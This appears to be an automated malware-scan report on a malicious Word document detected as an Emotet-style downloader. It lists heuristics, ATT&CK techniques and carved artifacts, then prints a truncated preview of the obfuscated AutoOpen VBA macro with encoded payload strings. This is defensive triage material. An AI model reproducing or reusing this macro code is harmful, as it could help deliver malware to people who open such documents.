Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristics related to VBA macros, including the presence of an AutoOpen macro and CreateObject calls. The embedded VBA script, named 'macros.bas', is obfuscated, but its structure suggests it is designed to download and execute a second-stage payload from a remote source, as indicated by the repeated GTrOMw function calls, which likely decode their string arguments and retrieve content. The AutoOpen macro is a common technique for executing malicious code as soon as the document is opened.
Heuristics (7)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71693 bytes |

SHA-256: e8e6765d37fa7939d3002589b3578812538c4d06ca5763aef1e95b6c683453a4

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 23 long base64-like blobs)

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "cbmXwjJVIhMSC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GrKXXbD"
Function RBhqVsi()
On Error Resume Next
Select Case PUOZj
Case 88532
HSrJoh = uqifa
BbGYK = mZbJaU
FzFhH = Cos(42454 * CBool(70152))
Case 48351
wFwOC = 25938
XTiIQ = Fix(30401)
OpPnHW = Oct(62363)
End Select
zGZWJBkQ = GTrOMw("4G3oqAiBgMAQDAjBwYAQGA2AANAIGAyAQOAQDAmBwMAQGAjBAMAUDAiBAZAADAwAQYAM3mC", 4 + 0, 63 + 0)
Select Case RoScV
Case 79549
XJqzz = BZvsYG
pvLFp = rrric
XqnJw = Cos(51282 * CBool(84288))
Case 57695
wVSQR = 21347
QTviP = Fix(55711)
VcNmJ = Oct(96586)
End Select
Select Case JszGw
Case 42573
KaZLHJ = mKLID
EACrw = QvDhjo
EiZKZ = Cos(36410 * CBool(49191))
Case 71819
DZkkR = 47149
KVTcJ = Fix(98876)
qIKwF = Oct(3389)
End Select
uMYQoithi = GTrOMw("JMFQOAMDAxAQMAMGAjBwNAIGAhBwNAEDAkBQNAUGAlBgMAcDAhBAZAkDAkBQOAkDA0AQZAYDAwAAOAIGA3AwYAIGA4AQZAkDAmBgNAEGAjBAZAcDA3AgZAADA1AwMAEGAwAwYAQGA5AgYAQGAyAQYAIDA1Ag96%P2k", 7 + 0, 153 + 0)
Select Case stXtF
Case 54037
Ampdj = wdGLjs
tMMMEE = jCOUU
wKfMrM = Cos(93111 * CBool(79141))
Case 20262
dwdAMN = 2177
RNHOfh = Fix(21329)
BHczXV = Oct(18267)
End Select
Select Case HtnFpZ
Case 7521
wEqOqF = FqmLi
PPLoK = JkZYR
QzDTNM = Cos(91817 * CBool(25373))
Case 59186
nbuPn = 12068
jmjVO = Fix(84147)
bQiPts = Oct(48313)
End Select
jjfRlSmnM = GTrOMw("Jk5iDA3AAOAQGA5AgMAgDA0AgZAYGA2AwNAMDA3AwYAUGAzAQNAUGAlBQYAUDAjBANAMDA1AQOAUGA0AAOAADA2AAZAMDA2AAZAEGA5AgYAADA2AgNAkDA3AQMAYGA1AAMAYDA5AQOAQDAjBAZAIGAkBQYAYGA5AQYAEGAlBgNAQGAjBQOAEDA2AQZAIDAiBgZAYk2", 3 + 0, 192 + 0)
Select Case YVZFMl
Case 55884
PVoOb = uvWDXq
iXCHYr = hjTmcG
Zphtb = Cos(11825 * CBool(24454))
Case 37199
ZdCrW = 68700
qUivqw = Fix(44502)
ntjsjC = Oct(3761)
End Select
Select Case YPnoUa
Case 79462
nwXqH = wcJoSw
ojiDj = IcpzVk
NqQapd = Cos(79748 * CBool(1270))
Case 33845
QzRbpT = 70336
Wnzki = Fix(18067)
nzjvwA = Oct(4904)
End Select
RwGTXIQ = GTrOMw("nLtgYAEDA4AAOAADA2AQOAcDnQzYwY", 7 + 0, 21 + 0)
Select Case NdFMi
Case 96501
HBWsNE = wTJFq
wwdIGq = dJFTn
tDwjH = Cos(3208 * CBool(16816))
Case 65769
wNpvfY = 2366
mtJEJ = Fix(33386)
zFswKw = Oct(92826)
End Select
Select Case hPpPb
Case 38059
kCVrUP = Ibtqf
jJFuo = flvFvK
cwisD = Cos(11140 * CBool(65572))
Case 91133
ZUjEnp = 82733
cCCda = Fix(47327)
vbdow = Oct(79064)
End Select
QwfviAiwIj = GTrOMw("lUcjIDA5AwMAADAmBgNAIGAkBwMAMDAhBwMAMDAkBwMAIGA4AwMAYDAyAAOAYGAhBQOAYDAhBQZAIGA5AQYAIDA0AQNAEGAwAQMAQGAxAQMAcDAxAQMAYDA0AQYAcDAjBAOAUIX3Y.", 6 + 0, 129 + 0)
Select Case ajDmLd
Case 67629
kzbnkl = jLpuc
sInBXU = bctwDc
DAAiNj = Cos(73548 * CBool(35091))
Case 8714
noXkr = 33568
CMShYP = Fix(71203)
ImOHEc = Oct(68915)
End Select
Select Case LCRib
Case 9926
bWiEL = snsWt
puKjw = JJUsY
rQTLA = Cos(88370 * CBool(85260))
Case 6387
EEWOcR = 86387
jjYaB = Fix(27272)
BSThR = Oct(91104)
End Se
... (truncated)